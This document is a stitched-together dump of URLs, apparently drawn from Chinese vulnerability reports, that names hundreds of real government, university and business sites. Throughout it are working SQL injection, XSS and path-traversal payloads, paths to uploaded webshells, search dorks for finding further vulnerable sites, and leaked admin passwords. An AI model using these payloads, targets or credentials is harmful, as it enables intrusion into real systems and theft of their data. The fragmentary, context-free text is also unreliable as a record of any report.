https://mail.sydzj.gov.cn/ https://mail.syzx.gov.cn/ https://mail.northeast.gov.cn/ https://mail.expo2006sy.gov.cn/ https://mail.orion-iso.cn/ https://mail.syidc.com/ https://mail.sygh.org/ http://www.gsfzb.gov.cn/(甘肃省政府法制信息网)可以进入到甘肃省法制办证件管理系统登陆页面(http://61.178.82.54:9090/zjgl/publicQueryCard.action) http://ka.gfan.com http://ka.gfan.com/search?q=1 https://www.jsgrain.gov.cn/ www.jsgrain.gov.cn http://mobile.dper.com/dper/login jar:/usr/local/tomcat/bin/../lib/cookie-java-agent-0.1.jar:/usr/local/tomcat/bin/../lib/byteman-2.1.2.jar http://mobile.dper.com/struts/webconsole.html http://115.29.236.28/oms/order_consignee_data_collector?ordercode=APECHI1230002312 http://115.29.236.28/oms/order_consignee_data_collector?ordercode=APECHI1230002312 http://tl.db.17173.com/suits.php?ItemName=&ItemClass=&MinLv=&MaxLv=&Nums=&ord=ItemName%7CDESC http://opac.sspu.edu.cn/opac/admin/ http://xlzx.kmust.edu.cn/main!newsView.action 
www.verymall.cn http://222.76.218.187:9002/hrpm/newsAction!getNewsAllInfo.action http://gjj.wh.cn/ http://218.22.66.214:8088/search_wh.aspx http://www.zcool.com.cn/event/winnerlist.do?cup=12&event_id=76&p=&pagesize=1000000&recommend=&sort= http://www.jxehe.com/ http://www.jxsyxx.com/Manage/ http://www.hnzwxx.com/Manage/ http://www.nhqms.com/Manage/ http://www.dbsdnhsy.com/Manage/ http://www.jxzljy.com/Manage/ http://www.jxgzyey.com/Manage/ https://ku6data.sdo.com https://ku6data.sdo.com/upload/ http://blog.suqian.gov.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://club.jledu.gov.cn/ss/batch.common.php?action=modelquote&cid=1&name=spacecomments http://op.yeepay.com/ http://op.yeepay.com/%3Csvg/onload=alert%28%29%3E http://op.yeepay.com/admin/%3Csvg/onload=alert%28%29%3E http://op.yeepay.com/index.jsp/%3Csvg/onload=alert%28%29%3E http://op.yeepay.com/admin/login.jsp http://202.108.8.97/ http://bbs.bee2c.com/forum.php http://mail.10035.com.cn/AppClientUpgrade/download.do http://mail.10035.com.cn/AppClientUpgrade/download.do http://novosti-kosmonavtiki.ru/forum/forum12/topic13702/ BY:N292143E1091008-N292620E1084558- LIMITS:SFC-UNL http://www.zte-e.com/cn/online.aspx http://seeyou.seecom.com.cn/中兴视通 http://seeyou.seecom.com.cn/web.rar http://cq01-hm-webtest01.vm.baidu.com:8800/web/welcome/login http://tongji.baidu.com/ http://pss.uestc.edu.cn/tasi/admin/ http://202.120.121.200/tasi/admin/ http://paper.sysu.edu.cn/TASi/admin/login.asp http://202.117.102.169/admin/ http://202.112.150.64/TASi/admin/ http://www.wintour.cn/ http://www.guangzhougdhhotel.com/ www.guangzhougdhhotel.com http://www.guangzhougdhhotel.com http://www.umeweb.cn/ www.lnredcross.org.cn/web/content.asp?id=46&articleid=1006 url:http://hope.haier.com/Article/index/detail?id=225181 http://huodong.2345.com/liuyan2/new.php?c=comment&a=new_&z=12&v=2 
http://www.nhfpc.gov.cn/xxgk/pages/getManuscriptByType_manuscript.action?codeId=-1'%20OR%203*2*1%3d6%20AND%20000675%3d000675%20--%20&type=A_styleType http://61.49.18.66/xxgk/pages/getManuscriptByType_manuscript.action?codeId=-1'%20OR%203*2*1%3d6%20AND%20000675%3d000675%20--%20&type=A_styleType http://61.49.18.65/xxgk/pages/getManuscriptByType_manuscript.action?codeId=-1'%20OR%203*2*1%3d6%20AND%20000675%3d000675%20--%20&type=A_styleType http://xapp.baidu.com/ http://www.chizhoufgw.gov.cn/shownews.asp?auto_id=2845 http://www.erqi.gov.cn:8081/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://lib.cuc.edu.cn/opac_two/search2/s_detail.jsp?sid=0101074933 http://www.gs.whu.edu.cn/ziye/jiankao/login.aspx www.ieeyou.cn http://www.ieeyou.cn/init/uploadFile.jsp http://www.ieeyou.cn/updownFiles/xx.jsp/xx.jsp http://223.68.141.131/login.do?reqCode=init http://www.vasee.com/help/feedback.jsp http://bobobaby.com.cn http://bobobaby.com.cn/login.aspx http://bobobaby.com.cn/register.aspx http://bobobaby.com.cn/Uploadfile/image/user/yjha.asp http://bobobaby.com.cn/Uploadfile/image/user/1.asp www.ieeyou.cn http://www.ieeyou.cn/asms/index.jsp http://www.nxsuny.com http://nxsmnszs.com/about.asp?AsSortID=1 http://nxsmnszs.com/proinfo.asp?id=351 http://nxsmnszs.com/newsinfo.asp?id=369 http://nxsmnszs.com/message.asp?AsSortID=33 http://www.nxadmc.com/about.asp?AsSortID=3 http://www.nxadmc.com/proinfo.asp?id=198 http://www.nxadmc.com/newsinfo.asp?id=210 http://www.nxadmc.com/message.asp?AsSortID=4 http://www.ychysp.com/about.asp?AsSortID=1 http://www.ychysp.com/proinfo.asp?id=562 http://www.ychysp.com/newsinfo.asp?id=378 http://www.ychysp.com/message.asp?AsSortID=53 http://www.nxyatfl.com/about.asp?AsSortID=64 http://www.nxyatfl.com/proinfo.asp?id=530 http://www.nxyatfl.com/newsinfo.asp?id=424 http://www.nxyatfl.com/message.asp?AsSortID=63 http://www.qzlpgs.com/about.asp?AsSortID=54 http://www.qzlpgs.com/proinfo.asp?id=866 
http://www.qzlpgs.com/newsinfo.asp?id=390 http://www.qzlpgs.com/message.asp?AsSortID=53 http://www.grace-english.com/about.asp?AsSortID=30 http://www.grace-english.com/proinfo.asp?id=331 http://www.grace-english.com/newsinfo.asp?id=340 http://www.grace-english.com/message.asp?AsSortID=33 http://www.nxdongcheng.com/about.asp?AsSortID=1 http://www.nxdongcheng.com/proinfo.asp?id=740 http://www.nxdongcheng.com/newsinfo.asp?id=885 http://www.nxdongcheng.com/Article/Message.asp?ID=378 http://www.nxksjc.com/about.asp?AsSortID=1 http://www.nxksjc.com/proinfo.asp?id=664 http://www.nxksjc.com/newsinfo.asp?id=682 http://www.nxksjc.com/message.asp?AsSortID=64 http://www.usana1992.com/about.asp?AsSortID=53 http://www.usana1992.com/proinfo.asp?id=379 http://www.usana1992.com/newsinfo.asp?id=370 http://www.usana1992.com/message.asp?AsSortID=52 http://gesenna.gotoip3.com/about.asp?AsSortID=67 http://gesenna.gotoip3.com/proinfo.asp?id=443 http://gesenna.gotoip3.com/newsinfo.asp?id=495 http://gesenna.gotoip3.com/message.asp?AsSortID=66 http://www.nxthbp.com/about.asp?AsSortID=1 http://www.nxthbp.com/proinfo.asp?id=409 http://www.nxthbp.com/newsinfo.asp?id=487 http://www.nxthbp.com/message.asp?AsSortID=52 http://www.nxycwy.net/about.asp?AsSortID=1 http://www.nxycwy.net/proinfo.asp?id=499 http://www.nxycwy.net/newsinfo.asp?id=532 http://www.nxycwy.net/message.asp?AsSortID=64 http://tjdag.gov.cn/tjdag/wwwroot/root/template/main/jgsl/lsbl_article.shtml?id=670 http://www.zgc-ft.gov.cn/adminindex.jsp http://ts.21cn.com任意投诉评论处,上传一图片 http://ts.21cn.com/Public/jQuery-File-Upload/server/php/files/14138672359707.png http://ts.21cn.com/Public/jQuery-File-Upload/ http://www.yivicar.com/home/help/view/id/47/name/foot.html http://www.yivicar.com/home/work/index.html?goaddxy=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%28document.cookie%29%3C/scRipt%3E http://www.auib.com.cn/product/是个管理页面,刚开始用awvs扫描发现的,用chrome打开空白页面,只能看到title,遂想到会不会浏览器版本的问题,换成IE7兼容模式果然看到如图页面 
http://www.auib.com.cn/product/common/easyQueryVer3/EasyQueryVer3.js源码,其中有如图所示代码 http://www.auib.com.cn/product/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=select%20*%20from%20fduserlogin,如图 http://www.auib.com.cn/product/download/download.jsp?FileName=../../../../../../../../../../etc/passwd,如图 http://oa.nstl.gov.cn/java-oa/index.jsp http://www.xtkfqjcy.gov.cn/index.asp http://www.xtkfqjcy.gov.cn/admin/login.asp http://222.73.220.177:8080/index.do http://192.168.1.105/discuz/uc_server/admin.php http://localhost/discuz/uc_server/admin.php?m=seccode&seccodeauth=250dIGq%2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94&7500 http://www.aapinche.cn/account/mobile.aspx?do=validmobile&Mobile=18156428592 www.aapinche.cn http://www.zhilelending.com/ http://202.85.219.134:8080/ http://www.dyk.com.cn:80/promotion/index?type=89 http://www.xxsfj.gov.cn/ http://www.xxsfj.gov.cn/master/login.php http://jiuye.swjtu.edu.cn:80/jdjy/CollegeManage/Major_detail.aspx?dptID=25 http://www.skynj.com/ inurl:homepages/content_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/homepages/content_page_ex.aspx?id={661350D3-A37F-4D8E-A344-5E7A9932C97C http://58.222.195.110:8081/jyweb/homepages/content_page_ex.aspx?id={DB211DE3-1A77-4B16-8F30-D5B637B80FE2 http://61.178.185.50/tzweb/homepages/content_page_ex.aspx?id={A7B3B229-E087-45F9-A8AC-6C8AA4CCF98E http://58.213.129.206:8080/jytweb/homepages/content_page_ex.aspx?id={E1C5A45F-50FC-46F4-8210-A95F035DA8F4 http://qlgk.taixing.gov.cn/homepages/content_page_ex.aspx?id={863FB079-C6E8-45A4-BAD9-5CA2935376AF inurl:permissionitem_list_Sort.jspx?sortcode= http://www.kfxzzx.gov.cn/permissionitem_list_Sort.jspx?sortcode=003003&areaid=410203 http://222.143.52.13/permissionitem_list_Sort.jspx?sortcode=001001012&areaid=410100 http://www.gzegn.gov.cn/gzzfwz/permissionitem_list_Sort.jspx?sortcode=002018 http://smwsbsdt.xintai.gov.cn/permissionitem_list_Sort.jspx?sortcode=002001015 http://www.gazwzx.org:8888/permissionitem_list_Sort.jspx?sortcode=002006&areaid=520555 
http://fw.hzzk.gov.cn/permissionitem_list_Sort.jspx?sortcode=001002004 http://www.zyszwdt.gov.cn/permissionitem_list_Sort.jspx?sortcode=002003002&areaid=620700 http://www.gzdpc.gov.cn:8080/gzzfwz/permissionitem_list_Sort.jspx?sortcode=002026 http://www.gzfg.gov.cn:8080/permissionitem_list_Sort.jspx?sortcode=002001017&areaid=520327 http://58.42.237.134:8888/permissionitem_list_Sort.jspx?sortcode=001015&areaid=520000 http://211.142.146.2:8016/permissionitem_list_Sort.jspx?sortcode=003004&areaid= http://wsbs.xinhui.gov.cn/permissionitem_list_Sort.jspx?sortcode=002001014&areaid=440705 http://www.dyhd315.gov.cn/ww315/VoteList.asp?webvoteid=13 http://dianping.lenovo.com.cn/valuation/index.php/index/search?k=think http://www.stegd.edu.cn/selfec/这个教育部网站,叫我去5184报考 http://www.qingting.fm/ http://zhanghongweigzs.com:8080/a.jsp http://qhld.ncu.edu.cn/show.asp?id=487 http://qhld.ncu.edu.cn/upload.asp http://qhld.ncu.edu.cn/login.asp username:admin password:admin159 www.aapinche.cn http://video.yundasys.com:8080/login.action http://www.xintai.gov.cn/siteserver/login.aspx https://github.com。依旧没有任何ssl错误的提醒,确认有证书盲注信任的漏洞。 http://mech.ncu.edu.cn/ArticleDisp.aspx?id=613 http://www.bohoog.com/ http://www.gzql.org/NewsSearch.aspx?TxtKey= http://www.gzswtzb.org.cn/NewsSearch.aspx?TxtKey= http://www.gyjydj.gov.cn/NewsSearch.aspx?TxtKey= http://www.gitsa.org/NewsSearch.aspx?TxtKey= http://www.gzzqy.net/NewsSearch.aspx?TxtKey= http://www.vip7885.com/NewsSearch.aspx?TxtKey= http://www.gzjlcs.gov.cn/NewsSearch.aspx?TxtKey= http://www.gzromon.com.cn/NewsSearch.aspx?TxtKey= http://www.jysjc.com:90/NewsSearch.aspx?TxtKey= http://sgrb.sgsgjt.com/NewsSearch.aspx?TxtKey= http://www.gzpack.net/NewsSearch.aspx?TxtKey= http://www.gzpack.net/NewsSearch.aspx?TxtKey= http://sgrb.sgsgjt.com/NewsSearch.aspx?TxtKey= http://rjt.czlib.net:8010/Softwarer/course/courseintro.asp?CODE=00038 http://sy2.hbdlib.cn/Softwarer/course/courseintro.asp?CODE=00059 
http://27.115.0.215/Softwarer/course/courseintro.asp?CODE=00049 http://202.112.200.137/softwarer/course/courseintro.asp?CODE=00003 http://219.134.134.193:8082/Softwarer/course/courseintro.asp?CODE=00036 http://softstar.blcu6.edu.cn/softwarer/course/courseintro.asp?CODE=00030 http://www.softtone.cn/SoftWarer/course/courseintro.asp?CODE=00038 http://mmc.ncu.edu.cn/show.asp?id=563 www.runideas.com,还有多个地方分站 http://www.runideas.com/case/,有几十个行业,由于各个行业网站注入点不一定在同一个地方,因此下面提供的实例选了几个行业的供wooyun审核及厂家确认。 http://www.gdzsyy.net/news_detail.php?cid=2&id=103 http://www.gzmpc.com/index.php/Human/index/id/26 http://www.legacytaiwan.com/news_detail.php?cid=1&id=136 http://www.faithplus.cn/newsus.asp?id=71 http://www.zhong-yu.com.cn/news_detail.php?cid=1&id=32 http://www.guangchang-owens.com/news_detail.php?cid=1&id=29 http://www.56xh.org/news_detail.php?cid=13&id=6 http://www.wewapower.com.cn/news_detail.asp?ID=73 http://www.atek-china.com/en/products/products.asp?MaxID=2 http://www.sunshineent.com/ninfo_en.asp?id=24 http://www.guangchang-owens.com/news_detail.php?cid=1&id=29 http://www.deko-cn.com//topic.php?channelID=3&topicID=3 http://www.hirp.cn/cn/newslist.asp?n_type=1&cur=&n_id=142 http://www.gdforland.com/cn/news.asp?n_type=1&cur=&n_id=112 http://www.kendafarben.com.cn/news-details.aspx?category=14&id=12 http://www.vasled.com/product_list.asp http://www.hzysysh.com/news.asp http://www.hzgsl.org/news.asp http://www.gdgcc.com/sousuo.asp http://www.gdeic.com/standard.asp http://www.gcvidi.com/product.asp http://www.ohed.com/search.html?key=1 http://www.gdforland.com/cn/products.asp http://www.f-yg.cn/product.php http://www.lonon.com.cn/select_C.jsp?select=3&content=admin http://www.gdzsyy.net为例来证明注入漏洞存在 http://www.gdzsyy.net/news_detail.php?cid=2&id=103 http://www.zjgedz.gov.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://zhibiao.hexun.com/home/_IndexDetail_XG/6?indexid=395&indexclass=2&sort=fld_adddate&dire=desc 
http://www.bsrtv.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.kmgps.net/ http://vip.baihe.com/cms/batch.common.php?action=modelquote&cid=1&name=spacecomments http://gtzl.mlr.gov.cn/dataspace/person/d6bc9b03-ea89-4472-9126-cf5fa6b82ef9.jsp pwd:ninty http://www.phpwind.net/admin.php http://www.phpwind.net/windid/admin.php http://www.jzyy1949.com/jzyy/yiliao/pic/upload/e61c5308683945eba43698af8751b368.jsp http://shpaf.shu.edu.cn/GCSS/extra_page/printpage.asp?ArticleID=806 http://shpaf.shu.edu.cn/GCSS/admin/admin/login.asp http://wsyc.fengshun.cc/admin http://emotion.baihe.com/batch.common.php?action=modelquote&cid=1&name=spacecomments http://yczjj.yancheng.gov.cn/主站,溜达到权力阳光(http://218.92.192.197:7001/web/),尝试发现weblogic入口,弱口令weblogic直接进入。貌似配置有点问题,没敢乱动。 http://blog.cntv.cn/,用户A新建一个相册分类,进行编辑 http://**.**.**/doc/page/login.asp inurl:ReadBigClassmb.asp?id= http://www.polypm.com.cn/index.php?s=/Video/index/Catgory/1 http://i.fun.tv/网址,风行网客服页面 http://cms.voc.com.cn/voccgi/app/mobile/bbsapi/wxhn_login.php http://opinion.gbxxzyzx.com/manage/login/login!go http://218.106.115.38:8881/HPService/ http://218.106.115.38:8881/HPService/LoginAction!loginAction.action http://rzt.cfae.cn/ http://rzt.cfae.cn/jmx-console/ http://rzt.cfae.cn/is/index.jsp encap:Ethernet AC:C0:FA:0C:96 addr:10.10.33.33 Bcast:10.10.33.255 Mask:255.255.255.0 c0ff:fefa:c96/64 Scope:Link MTU:1500 packets:402211559 packets:537146083 txqueuelen:1000 http://www.dodoca.com/ http://daili.dodoca.com/ http://www.dodoca.com/ inurl:gov.cn/ShowNews.asp http://xxx.gov.cn/shownews.asp?id=xx&Bid=xx&Sid=xx http://www.chstats.gov.cn/shownews.asp?id=304&Bid=7&Sid= http://chssgw.gov.cn/shownews.asp?id=2545&Bid=4&Sid=25 http://www.chcj.gov.cn/shownews.asp?id=359&Bid=77&Sid=49 http://www.conghuajt.gov.cn/shownews.asp?id=381&Bid=76&Sid= http://www.chaudit.gov.cn/shownews.asp?id=230&Bid=77&Sid=46 http://www.chlt.gov.cn/shownews.asp?id=474&Bid=76&Sid= 
http://www.chny.gov.cn/shownews.asp?id=350&Bid=89&Sid=61 http://admin.diantai.ifeng.com/ http://diantai.ifeng.com http://admin.diantai.ifeng.com/index.php/cpupload/edititem/1093151 http://www.91job.gov.cn/p_register.aspx http://mobiletest.yeepay.com/ http://www.sta.sh.cn:8080/xjxy/sub14_detail.jsp?id=12507&num=mm&lm=49-5 http://sms.tootoo.cn/login.action http://222.38.19.234/ https://ebank.bankofbeijing.com.cn/bccbpb/downloadBJCA/bjcaotp.exe http://xh.sysu.edu.cn/inc/showNEWS.asp?id=151 http://media.baihe.com/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.ce.zju.edu.cn/cj/manage http://blog.dbw.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.bobobaby.com.cn/fckeditor/editor/fckeditor.html http://www.infojiading.cn/ http://www.infojiading.cn/Information.asp?TParentColumnId=0003 site:edu.cn http://www.busjz.com/index.html http://218.200.69.81:90/jzbusorg/Login_A4.aspx http://youni.im/index.php?r=login/Download&file= http://youni.im/index.php?r=login/Download&file=protected/config/main.php http://xapp.baidu.com/ http://www.fenqingba.com/index.php/display/freshkanjiang/12* http://www.zmdwsj.gov.cn/mainNew.action http://www.zmdwsj.gov.cn/mainNew.action http://ftp.fangguangsi.cn/1.php http://www.tzxzsp.gov.cn/egov/portals_zj/zjba/index.jsp?unid=8577D7EA3FF9F4EB2769534D1C224D8E http://www.xsbszx.gov.cn/was/xsqweb/djyd/index.jsp?unid=20100201-ADE2D7259CAF3C626176-11 http://fwzx.qingmeng.gov.cn:81/apas/portal/articlelist/index.jsp?pCateunid=BF96A69DB087B74C6CDCD497A1D817C8%27%20and%20%271%27=%271&cateunid=EECC5C2E36A34D7CE84EC063BB1C83D6(这个貌似参数名改了下,一样的) http://spzx.ouhai.gov.cn/was/was/web/wzouhai/wssp/serviceDetail.jsp?unid=A736149391BEDA5A30DE2E23F561C256 http://xzfwzx.wetdz.gov.cn/was/was/web/wzkaifaqu/wssp/serviceDetail.jsp?unid=96514A86DC0823D479194641F5633FB8 http://www.yhfw.gov.cn/was/portals/guide/service.jsp?unid=20100825-93855515A2525BF3B2F6-11 
http://xzfwzx.wetdz.gov.cn/was/was/web/wzkaifaqu/wssp/serviceDetail.jsp?unid=96514A86DC0823D479194641F5633FB8 http://ga.wzcc.cn/newwzwas/wzwas/webapp/country/cnga/jsp/service.jsp?unid=F13FC1AD2AED4439B3D721BC29C33251 http://www.xsbszx.gov.cn/was/portals/webSend/service.jsp?unid=20120807-7B1712E4DA4D4C63718A-11 http://www.yhfw.gov.cn/was/portals/new/content.jsp?unid=20141020-6EBE1CDA07993AC2F35A-11 http://gss.feiren.com/updownFiles/xx.jsp/xx.jsp http://gss.feiren.com/updownFiles/xx.jsp/1.jsp http://mail.solarisbaby.com:8080/maintlogin.jsp http://www.fjhospital.com/fckeditor/editor/filemanager/connectors/test.html http://hlbers.gov.cn/VIPCompanyDetail.aspx?cid=hu279yrcj83112%27 http://club.ehuatai.com https://219.140.170.149/por/login_psw.csp?rnd=0.23481154129256765 https://account.oppo.com http://kdjyxk.post.gov.cn/register_logout.do server:/opt/app/jdk1.6.0_45/jre/lib/amd64:/opt/app/jdk1.6.0_45/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib http://java.sun.com/ http://bbs.share.youku.com/uc_server/admin.php?m=user&a=login&iframe=&sid= http://bbs.share.youku.com http://www.autohome.com.cn/ http://58.222.184.133/tzxyweb/project/entdept_creditinfo_page.aspx?id={E968C3E3-51C7-4071-ABEC-3552CBF7749F http://58.222.195.110:8081/jyxyweb/project/entdept_creditinfo_page.aspx?id=%7B0E586238-776C-45AA-8ED1-7B2E563C817C%7D http://58.222.212.114:82/project/entdept_creditinfo_page.aspx?id=%7BA218F21B-11E9-40B4-B2F4-D0E9912C0520%7D http://58.222.216.220/ggxygkweb/project/entdept_creditinfo_page.aspx?id=%7B2CEB2EC1-5F04-4741-9611-C9A23204DF0D%7D http://58.222.202.135:82/project/entdept_creditinfo_page.aspx?id=%7B057E366B-EF45-42D6-A362-AC4CC7517DB9%7D http://58.222.211.21/xhxyweb/project/entdept_creditinfo_page.aspx?id=%7B07B13319-8940-4501-8031-32565500E0DC%7D http://58.222.184.133/tzxyweb/project/entpeo_creditinfo_page.aspx?id=%7BBD37661D-313B-4BB3-A0F4-C5584A51E6C4%7D 
http://58.222.216.220/ggxygkweb/project/entpeo_creditinfo_page.aspx?id=%7B30F4EBB5-A298-4B9F-ADED-6FFAA2A17507%7D http://58.222.195.110:8081/jyxyweb/project/entpeo_creditinfo_page.aspx?id=%7B0A225809-C6D3-4EFB-9A80-F96A7206B260%7D http://58.222.212.114:82/project/entpeo_creditinfo_page.aspx?id=%7BCA7AFEF7-3E2D-40A1-9CD7-B6AC34D5270E%7D http://58.222.211.21/xhxyweb/project/entpeo_creditinfo_page.aspx?id=%7BB3CCEC94-4B0D-4FAA-B518-1147BB67E9DD%7D http://58.222.184.133/tzxyweb/project/project_info_page.aspx?id=%7B66B02592-5D98-4B7E-BC00-23964CA732C1%7D http://58.222.202.135:82/project/project_info_page.aspx?id=%7B81223F67-B3FC-4817-A028-166231F643EF%7D http://58.222.195.110:8081/jyxyweb/project/project_info_page.aspx?id=%7B6D2DF990-AE72-405A-AFA6-BC9903972698%7D http://58.222.212.114:82/project/project_info_page.aspx?id=%7B84C1347E-F2FC-4F1E-B4ED-88EEA87C744C%7D http://58.222.216.220/ggxygkweb/project/project_info_page.aspx?id=%7BA43ECDD1-3847-4688-8E22-C9A371C1E154%7D http://218.61.60.218/productadmin2/,http://218.61.60.217/iportaladmin/ www.gdpa.edu.cn/mmcnews/office/mmcinfo/view_file.php?id=221&work=view_file http://icrm.creditease.cn/login http://icrm.creditease.cn/media.jsp encap:Ethernet A9:B4:5B addr:10.150.180.123 Bcast:10.150.180.255 Mask:255.255.255.0 fea9:b45b/64 Scope:Link MTU:1500 packets:262663400 packets:302287758 txqueuelen:1000 http://oa.jinher.com/jc6/platform/sys/login!intro.action http://114.242.166.240/ http://xuexi.creditease.cn/website.rar http://rkjj.ahpfpc.gov.cn/MenuList.aspx?id=67 http://rkjj.ahpfpc.gov.cn/Newslist.aspx?key=1 http://521gx.com/Easy/Login2.aspx http://cyou0755.com/Easy/Login2.aspx http://www.ytjie.cn/Easy/Login2.aspx http://gxbdsp.com/Easy/Login2.aspx http://wr-sz.cn/Easy/Login2.aspx http://w250.es-cloud.net/Easy/Login2.aspx http://yidasiyin.com/Easy/Login2.aspx http://leaders56.com/Easy/Login2.aspx http://www.easaashop.cn/Easy/Login2.aspx http://61.136.101.71:8080/ http://cs.longtugame.com/question/rechview?qid=380000 
http://www.025journal.com/ http://www.025journal.com/demo1/ http://www.025journal.com/demo2/ http://www.025journal.com/Web/CommonPage.aspx?Id=8 http://www.doclass.com/ http://www.doclass.com/page/school1.html http://www.doclass.com/page/school2.html http://www.doclass.com/page/school3.html http://www.doclass.com/page/school4.html http://app.doclass.com/xtreg/UserReg/UserReg.aspx http://www.czsz.cn/schinfo/passport/login.aspx http://wyx.creditease.cn/manage/index.jsp http://www.wecrm.com/ http://www.wecrm.com/static/consumer/ http://120.31.131.166:82/ http://120.31.131.166:82/soft_series_cps.php?series_id=-1 http://120.31.131.166:82/soft_series_cps.php?series_id=-1 http://sqlmap.org http://www.zh0379.com/ http://www.bfyhyc.com/sztdxx.asp?id=726&kind=58 http://www.bflad.com/sztdxx.asp?id=720&kind=46 http://www.luoyangxiaofang.com/sztdxx.asp?id=708&kind=58 http://www.lycbxf.com/sztdxx.asp?id=699&kind=46 http://dzj777.com/sztdxx.asp?id=782&kind=58 http://tjchangguan.com/sztdxx.asp?id=717&kind=57 http://www.lydahua.com.cn/sztdxx.asp?id=663&kind=69 http://www.13937942506.com/sztdxx.asp?id=815&kind=117 http://lyjzdz.com/sztdxx.asp?id=762&kind=61 http://www.liangxianjun.com/sztdxx.asp?id=1012&kind=46 http://www.qqldw.cn/sztdxx.asp?id=705&kind=46 http://www.liangxianjun.com/sztdxx.asp?id=1004&kind=46 http://www.bfyhyc.com/sztdxx.asp?id=726&kind=58 http://tjchangguan.com/sztdxx.asp?id=717&kind=57 http://wow.laoyuegou.com/guild/newsInfo/id/33725%20AND%20EXTRACTVALUE%289942,CONCAT%281,user%28%29,0x7c,version%28%29%29%29.html http://www.sxfda.cn/manager/upfile.asp http://www.sxfda.cn/manager/zp/nohack.asp;.jpg http://180.153.223.60:8080/ inurl:aboutus.php?type= http://www.goo17.com http://www.goo17.com/api/ad.php?id=4&catid=1&name=%27 http://www.jiejie365.com/api/ad.php?id=4&catid=1&name=%27 http://j.jiagle.com/api/ad.php?id=16&catid=4&name=%27 http://www.doclass.com/)的 
http://www.shixi.stn.sh.cn/schinfo/passport/Trans.aspx?UserName=1%27%2B+%28select+convert%28int%2C%28db_name%281%29%29%29+FROM+syscolumns%29+%2B%27&Password=S7lLvow2vE0T%2fjEneuKWjg%3d%3d http://www.shixi.stn.sh.cn/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== www.doclass.com这里找,或者给出一些: http://www.shsmly.com/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== http://www.shixi.stn.sh.cn/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== http://218.1.117.169/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== http://www.czsz.cn/schinfo/passport/Trans.aspx?UserName=a&Password=S7lLvow2vE0T/jEneuKWjg== http://www.jzrongda.com/ inurl:xwInfo.php http://www.yuxinhn.com/admin/login.php http://www.jz-feihong.com/xwInfo.php?id=9 http://www.jzjgjt.com/xwInfo.php?id=1574 http://116.255.153.184/www.jzjgjt.net/xwInfo.php?id=1308 http://www.jzgyjc.com/xwInfo.php?id=6 http://dongqichang.comwww.zhidong7.com/www.jzjgjt.net/xwInfo.php?id=346 http://142.nrns0ie7.jxspyl.com/www.qykjj.net/xwInfo.php?id=45 http://www.hnstz.com/xwInfo.php?id=1 http://www.jzs8jd.com/xwInfo.php?id=123 http://www.ylzhy.com/xwInfo.php?id=10 http://www.hngyjc.com/xwInfo.php?id=5 http://ww.hntgglc.com/www.jzjgjt.net/xwInfo.php?id=149 http://www.syfyp.com/xwInfo.php?id=10 http://www.qykjj.net/xwInfo.php?id=50 http://www.hnycdq.com/xwInfo.php?id=56 http://www.rongtaijieneng.com.cn/xwInfo.php?id=21 http://www.hnpanyue.com/xwInfo.php?id=11 http://www.jinghua-food.com/xwInfo.php?id=28 http://www.jhyjx.com/xwInfo.php?id=5 http://www.qycxjsw.com/xwInfo.php?id=3 http://www.hxzd.cn/xwInfo.php?id=6 http://www.cx-wl.com/ inurl:readnews.asp http://www.jierui-cnc.com/readpro.asp?id=1925 http://www.raruijian.com/readpro.asp?id=3234 http://www.shengzaoqp.com/cn/readpro.asp?id=3593 http://www.yanfeimachinery.com/readpro.asp?id=530 http://www.linmojixie.com/cn/readpro.asp?id=2150 http://www.dayunpy.com/readpro.asp?id=3359 
http://www.wxhz.net/readpro.asp?id=293 http://www.hymjg.com/readpro.asp?id=3872 http://www.hengshundz.com/readpro.asp?id=3073 http://www.raxtjx.com/readpro.asp?id=3226 http://www.bangjichina.com/cn/readpro.asp?id=2117 http://www.wdmjg.com/readpro.asp?id=3573 http://zjzhongao.com/readpro.asp?type_id=198&id=2443 http://www.yjkswl.com/readpro.asp?id=2137 http://www.rajiansheng.com/cn/readpro.asp?id=2145 http://www.wzrcjx.com/readpro.asp?id=3165 http://www.zj8888.com/cn/readpro.asp?id=532 http://www.chinajczs.com/readpro.asp?id=3370 http://www.raxcjx.com/cn/readpro.asp?id=2082 http://www.yihaomoju.com/readpro.asp?id=1956 http://www.wxhzw.net/readpro.asp?id=343 http://www.wenruipy.com/readpro.asp?id=3330 http://www.rayljx.com/readpro.asp?id=1969 http://zjltdq.com/readpro.asp?id=2032 http://www.zs888888.com/readpro.asp?id=3599 http://www.bxgstmj.com/cn/readpro.asp?id=2157 http://www.hzcable.net/readpro.asp?id=568&boardid=8 http://www.cx-wl.com/ inurl:readnews.asp http://www.hongbaochina.com/readnews.asp?id=22 http://www.ralifan.com/readnews.asp?id=51 http://www.chunyu-china.com/readnews.asp?id=19 http://www.chinahengshun.com/readnews.asp?id=22 http://www.rahuafeng.com/cn/readnews.asp?id=16 http://ydqd.net/readnews.asp?id=22 http://ragjzz.com/readnews.asp?id=18 http://www.cx-wl.com/readnews.asp?id=63 http://www.wzshenyu.com/readnews.asp?id=22 http://www.ramiaomu.com/readnews.asp?id=22 http://ruiliyj.com/readnews.asp?id=17 http://13958974119.com/readnews.asp?id=22 http://www.rahongtai.net/readnews.asp?id=57 http://razhuozheng.com/readnews.asp?id=41 http://www.shengzaoqp.com/cn/readnews.asp?id=22 http://www.zjbaixiao.com/cn/readnews.asp?id=47 http://www.meijiate.net/readnews.asp?id=60 http://65662899.com/readnews.asp?id=33 http://www.dayunpy.com/readnews.asp?id=69 http://www.linmojixie.com/cn/readnews.asp?id=47 http://www.anmogun.com/readnews.asp?id=67 http://www.chinaruibang.com/cn/readnews.asp?id=37 